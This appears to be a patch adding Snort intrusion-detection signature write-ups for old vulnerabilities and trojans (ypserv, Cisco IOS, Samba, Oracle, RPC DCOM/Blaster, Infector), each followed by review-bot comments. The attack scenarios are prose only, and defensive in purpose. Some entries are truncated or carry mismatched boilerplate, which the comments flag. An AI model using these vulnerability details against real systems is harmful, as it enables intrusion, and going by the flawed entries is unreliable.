+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
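Review bot: the third Detailed Information paragraph in 100000826.txt (credential validation boilerplate) does not relate to the SQL injection via the "mode" parameter of "search.php"; remove it. The second paragraph is a comma splice ("...backend for the application, the attacker may also...") and should be split. Fix "ona" to "on a" and "attackers choosing" to "attacker's choosing", and add the blank line before "--" after Affected Systems.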
--- /dev/null
+++ b/doc/signatures/2033.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+2033
+
+--
+Summary:
+A request has been made to rpc.ypserv from an external source that 
+should not have access to this service. This may be indicative of an 
+intelligence gathering activity as a prelude to a more serious 
+compromise of system resources.
+
+service against the target host.
+
+--
+Impact:
+Disclosure of sensitive system information to an unauthorized user.
+Possible denial of service.
+
+--
+Detailed Information:
+The rpc.ypserv daemon queries information in the local NIS maps. A 
+response to this query may divulge important information to the user 
+performing the query. This could lead to futher exploitation of 
+resources on the network.
+
+In addition, a vulnerability exists in ypserv on some Linux platforms 
+that could lead to a buffer overflow and root compromise of the target 
+host. This is achieved by making a multitude of requests for a NIS map 
+that does not exist.
+
+--
+Affected Systems:
+Multiple systems running versions of ypserv prior to 2.5.
+
+--
+Attack Scenarios:
+The attacker can craft a malicious request to rpc.ypserv such that 
+valuable information can be returned to the attacker.
+
+In the case of a buffer overflow, the attacker might issue a large 
+therefore, be seen many times.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+Upgrade ypserv to the latest version.
+
+Use /var/yp/securenets to list the hosts allowed to access this resource
+where appropriate.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6016
+http://www.securityfocus.com/bid/5914
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1232
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1043
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1042
+
+--
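Review bot: the Summary in 2033.txt ends with an orphaned fragment, "service against the target host.", that is not a sentence, and the second Attack Scenarios paragraph is truncated ("the attacker might issue a large" / "therefore, be seen many times."); the middle of that sentence is missing and should be restored from the original source. Also fix "futher" to "further" in Detailed Information.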
--- /dev/null
+++ b/doc/signatures/1313.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1313
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "up skirt".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "up skirt".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
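Review bot: the Summary in 1313.txt reads "a webpage was visited the included the content" and should be "that included"; the run of empty lines under Additional References should be collapsed to match the other files. Since this is a content policy rule rather than an attack signature, the Affected Systems entry "All" would be clearer as a statement that it applies to any client browsing through the monitored network.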
--- /dev/null
+++ b/doc/signatures/1544.txt
@@ -0,0 +1,78 @@
+Rule:
+--
+Sid:
+1544
+--
+Summary:
+This event is generated when an attempt is made to list the user 
+configuration file on a Cisco router or switch.
+--
+Impact:
+If successful, the switch will reveal the local authentication user 
+configuration file to an attacker without requiring prior 
+authentication.
+--
+Detailed Information:
+The HTTP server that is part of some versions of the Cisco IOS software 
+allows remote command execution when the access control method is set to
+local authentication.
+
+--
+Affected Systems:
+The following Cisco products can be affected.   Whether they actually 
+are vulnerable or not depends on the version of IOS that they are 
+running.   To properly determine if your product is vulnerable, see the 
+Cisco website referenced below.   This is not exploitable if the device 
+is using an access control method other than local authentication.
+Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 
+1400, 1500, 1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, 
+AS5200, AS5300, AS5800, 6400, 7000, 7100, 7200, ubr7200, 7500, and 12000
+series.
+Most recent versions of the LS1010 ATM switch.
+The Catalyst 6000 and 5000 if they are running Cisco IOS software.
+The Catalyst 2900XL and 3500XL LAN switch only if it is running Cisco 
+IOS software.
+The Catalyst 2900 and 3000 series LAN switches are affected.
+The Cisco Distributed Director.
+--
+Attack Scenarios:
+By making the request to a vulnerable system, an attacker can take 
+complete control of a Cisco device.
+--
+Ease of Attack:
+Simple.  HTTP GET request, a browser may be used.
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+This rule only looks for one particular command (show config cr).
+However, this vulnerability will allow any other command to be executed 
+on the device at the highest privilege level, and this rule will 
+not detect them.
+
+This rule only looks for attacks against systems that are included 
+in the $HTTP_SERVERS group.   Many administrators do not consider 
+routers or switches to be web servers, and therefore may not include 
+vulnerable devices in this group, causing an attack to proceed 
+unnoticed. If you think one of your routers or switches is vulnerable, 
+reference it in the $HTTP_SERVERS group.
+--
+Corrective Action:
+Turn off the web server functionality, use access lists to ensure only 
+trusted hosts have access to the device, use TACACS+ or RADIUS for 
+access control, or upgrade your version of IOS.
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+Cisco
+http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html
+
+--
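Review bot: the Impact in 1544.txt says the device "will reveal the local authentication user configuration file", while Attack Scenarios and False Negatives say any command can be executed at the highest privilege level and the attacker can take complete control; Impact should state that full consequence. Affected Systems runs the caveat text and the product list together in one block; separate them, and reduce the triple spaces after periods to single spaces.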
--- /dev/null
+++ b/doc/signatures/100000505.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000505
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Nucleus CMS" application running on a webserver. 
+Access to the file "server.php" using a remote file being passed as the 
+"DIR_LIB" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DIR_LIB" parameter in the "server.php" script used by 
+the "Nucleus CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Nucleus CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
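Review bot: the third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host ...") is generic credential-validation text and does not describe the remote file include in "server.php" via "DIR_LIB" that the Summary documents; drop it, or replace it with one sentence on why attacker-supplied content included through DIR_LIB leads to the code execution listed under Impact. Since Ease of Attack states "Exploits exist", Additional References should not be empty; add the advisory that documents this vulnerability. Wording fixes: "an exploitation attempt has been attempted" -> "an exploitation attempt has been made", "ona" -> "on a", "attackers choosing" -> "attacker's choosing", and add the blank line before the "--" that follows the Affected Systems entry, as the other sections have.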
--- /dev/null
+++ b/doc/signatures/3031.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3031
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
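Review bot: Detailed Information describes the flaw as a memory allocation error "exploited by an attacker to cause an integer overflow", while Attack Scenarios says the attacker must "overflow a buffer containing the information for the access control lists"; state the mechanism once and consistently (is the rule looking at the ACL count/size field or at an over-long ACL payload?), because that is what an analyst needs to judge a hit. Additional References is empty even though Affected Systems gives a precise range ("Samba 3.0.8 and prior"); add the vendor advisory that range comes from. Typos and layout: "heterogenous" -> "heterogeneous", missing space in "server.The problem", "None Known" -> "None known." as in the other files, and trailing spaces on several "-- " separators.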
--- /dev/null
+++ b/doc/signatures/3121.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3121
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
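Review bot: the stray blank line between the "-- " separator and "Corrective Action:" breaks the layout used in every other section (separator immediately followed by the heading); remove it. In Affected Systems, "Microsoft Windows Server 2000" should be checked against the vendor bulletin; Microsoft's product name is Windows 2000 Server, which would also read consistently with "Microsoft Windows NT Server" on the next line. Additional References is empty although Detailed Information describes a specific unchecked-buffer flaw in message-length processing; add the Microsoft security bulletin for the License Logging Service issue so the reader can confirm the patch named in Corrective Action.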
--- /dev/null
+++ b/doc/signatures/2622.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2622
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in useful
+tasks. The "drop_an_object" procedure contains a programming error
+that may allow an attacker to execute a buffer overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the third variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
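Review bot: Ease of Attack says "Simple." but Attack Scenarios states the attack "requires an attacker to logon to the database with a valid username and password combination"; record that prerequisite in Ease of Attack, since an authenticated-only overflow is rated differently by operators who restrict database accounts. Detailed Information says the overflow "is triggered by a long string in a parameter for the procedure" while Attack Scenarios says "the third variable"; use one description in both places (e.g. "the third parameter of drop_an_object"). The "$ORACLE_PORTS" sentence is Snort deployment guidance, not a description of the vulnerability, and belongs under Corrective Action or a configuration note. Also "a Oracle database" -> "an Oracle database", and the Affected Systems entry is indented with spaces where the other files use a tab.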
--- /dev/null
+++ b/doc/signatures/2545.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid:
+2545
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in AppleFileServer.
+
+-- 
+
+Impact: 
+Serious. Unauthorized remote administrative access.
+
+--
+Detailed Information:
+AppleFileServer is used to share files and mount remote drives between 
+machines using Apple Macintosh OS X. An error in the processing of
+PathName may lead to a buffer overflow. If the length of a string for
+AFPName is longer than the declared length, the buffer will be
+overflowed and may present an attacker with the opportunity to execute
+code of their choosing.
+
+--
+
+Attack Scenarios: 
+An attacker can supply an AFPName longer than what is expected by the
+service and overwrite portions of memory leading to the execution of
+code.
+
+-- 
+
+Ease of Attack: 
+Simple
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disable AFP if not needed
+
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
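Review bot: the Affected Systems section is missing entirely (Detailed Information is followed directly by Attack Scenarios) while every other file in this patch has one; add it with the Mac OS X / AppleFileServer versions that are affected, taken from the vendor advisory rather than guessed. Detailed Information first refers to "the processing of PathName" and then to "a string for AFPName", and Attack Scenarios uses only AFPName; pick one name for the field so the reader knows which AFP element the rule inspects. Minor: "Simple" and "None Known" lack the period and capitalisation used in the other files, and the blank lines inserted after several "-- " separators are inconsistent with the rest of the patch.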
--- /dev/null
+++ b/doc/signatures/100000822.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000822
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VBZooM" application running on a webserver. Access to the file "reply.php" with SQL commands being passed as the "UserID" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "UserID" parameter in the "reply.php" script used by the "VBZooM" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZooM
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
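Review bot: the Summary, Impact and Detailed Information paragraphs are single unwrapped lines, unlike the rest of the documentation, which wraps at roughly 80 columns; wrap them. As in the Nucleus CMS file, the third Detailed Information paragraph about validating "the credentials of a client host" is generic and does not describe SQL injection through the "UserID" parameter of "reply.php"; remove it. Corrective Action only says to apply vendor patches, yet Attack Scenarios attributes the flaw to input "not correctly sanitized or checked before passing that input to the database"; add the application-level mitigation (validate the UserID value and use parameterised queries) for operators who cannot patch immediately. Wording: "ona" -> "on a", "attackers choosing" -> "attacker's choosing", "has been attempted" -> "has been made".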
--- /dev/null
+++ b/doc/signatures/1871.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1871
+
+--
+Summary:
+This event is generated when an attempt is made to access an Oracle 
+Application Server's XSQLConfig.xml configuration file.
+
+--
+Impact:
+Serious
+
+--
+Detailed Information:
+With the default installation of Oracle's  Application Server, it is 
+possible for an unauthorized user to view the XSQLConfig.xml file. This 
+file contains information such as the database server's name, user id's,
+and passwords.
+
+--
+Affected Systems:
+	Oracle 9i Application Server
+
+--
+Attack Scenarios:
+An attacker can use this to find out information about the database and 
+then use that information to compromise the server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives: 
+None known.
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action:
+Apply appropriate permissions to the file.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0568
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10855
+
+--
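Review bot: Impact reads only "Serious", while Detailed Information states the file "contains information such as the database server's name, user id's, and passwords"; spell out the impact (disclosure of database credentials, enabling the follow-on compromise described in Attack Scenarios). Corrective Action, "Apply appropriate permissions to the file", should say what that means in practice: XSQLConfig.xml must not be retrievable through the web server, and any credentials it held should be treated as exposed and changed once such access is observed. Typos: double space in "Oracle's  Application Server", "user id's" -> "user IDs", trailing space after the Nigel Houghton line.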
--- /dev/null
+++ b/doc/signatures/1705.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1705
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
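Review bot: the Summary and Detailed Information never identify the CGI application, script or vulnerability that sid 1705 matches; "a known vulnerability in a CGI web application running on a server" fits every other generic web-cgi file in this patch, so an analyst triaging this alert learns nothing specific here. Add at least the script name or URI pattern the rule looks for, narrow Affected Systems from "All systems running CGI applications", and give a reference under Additional References. Also wrap the over-long line "relationships between the victim server and other hosts can be exploited by the attacker.", and fix "ona" -> "on a" and "attackers choosing" -> "attacker's choosing".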
--- /dev/null
+++ b/doc/signatures/121.txt
@@ -0,0 +1,112 @@
+Rule:
+
+--
+Sid:
+121
+
+--
+Summary:
+Infector is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files
+and reboot the targeted machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Infector sever to
+programs normally started on boot. Due to the nature of this Trojan it 
+is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	117	Infector 1.x
+	120	Infector 1.6 Server to Client
+	121	Infector 1.6 Client to Server Connection Request
+
+This Trojan is commonly used to install other Trojan programs.
+
+The Trojan also makes changes to the system registry and win.ini file.
+
+Notification of an active server is achieved via IRC or ICQ.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+event is indicative of an existing infection being activated. Initial 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Apxil32.exe a backup 
+copy is made and usually named D3x32.drv.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
+
+Registry keys added are:
+
+	apxil32 = apxil32.exe
+
+Removal of this entry is required.
+
+Delete the file <drive>:\WINDOWS\Apxil32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected 
+machine is recommended.
+
+A change is also made to the win.ini file, the line run=apxil32.exe 
+apxil32.exe is added and should be deleted.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS315
+http://www.whitehats.com/info/IDS502
+http://www.whitehats.com/info/IDS503
+
+Diamond Computer Systems Security Advisory
+http://www.diamondcs.com.au/web/alerts/infector.htm
+
+Megasecurity:
+http://www.megasecurity.org/trojans/i/infector/Infector_all.html
+
+Simovits:
+http://www.simovits.com/trojans/tr_data/y1627.html
+
+--
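Review bot: this file has no Affected Systems section; the operating system list (Windows 95, 98, ME) sits inside Detailed Information and should move to an Affected Systems section as in the other files. The sentence "The Trojan server is located at <drive>:\WINDOWS\Apxil32.exe a backup copy is made and usually named D3x32.drv." is placed under Ease of Attack but is detection and removal information; move it to Detailed Information or Corrective Action and split it into two sentences. Under Corrective Action, "apxil32 = apxil32.exe" is a value under the listed Run and RunServices keys, not a key, so "Registry keys added are" should read "Registry value added is"; the trailing backslash on the first key path but not the second should be made consistent; and the win.ini line "run=apxil32.exe apxil32.exe" should be verified against the referenced advisories, as the repeated name looks like a copy error. Typos: "Infector sever" -> "Infector server"; in Impact, "and reboot the targeted machine" -> "and rebooting of the target machine".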
--- /dev/null
+++ b/doc/signatures/1082.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1082
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
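Review bot: as with sid 1705, this documentation does not identify the web-server vulnerability the rule detects; "Many known vulnerabilities exist for each implementation and the attack scenarios are legion" gives the reader no way to tell what triggers sid 1082 or whether a hit is relevant to their environment. Name the request pattern the rule matches and the affected product, narrow Affected Systems from "All systems using a web server", and add a reference under Additional References. Also "attackers choosing" -> "attacker's choosing".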
--- /dev/null
+++ b/doc/signatures/2493.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+2493
+
+--
+Summary:
+This rule no longer generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+This rule now uses flowbits and can be set to generate an event by
+modifying the rule slightly to remove the "flowbits:no_alert;" option.
+When traffic is detected that attempts to bind to the ISystemActivator
+object in MS RPC DCOM communications this rule now activates sids 2351
+and 2352 to detect exploits against this service. Cool huh?
+
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
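Review bot: the Summary says "This rule no longer generates an event", but Detailed Information later says "A number of events generated by this rule may indicate worm activity", and Impact, Ease of Attack and False Positives are written as if this rule alerts; make it consistent by stating that the events come from sids 2351 and 2352, which this rule enables through its flowbit, unless the operator removes "flowbits:no_alert;". Naming the flowbit this rule sets would let 2351 and 2352 be documented in terms of it. "Cool huh?" does not belong in reference documentation. Typos: "Expoit code" -> "Exploit code", "propogate" -> "propagate".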
--- /dev/null
+++ b/doc/signatures/2344.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+2344
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ArGoSoft FTP Server.
+
+--
+Impact:
+Execution of arbitrary code. Possible unauthorized administrative access.
+
+--
+Detailed Information:
+ArGoSoft FTP Server fails to perform sufficient checks on user supplied data to the
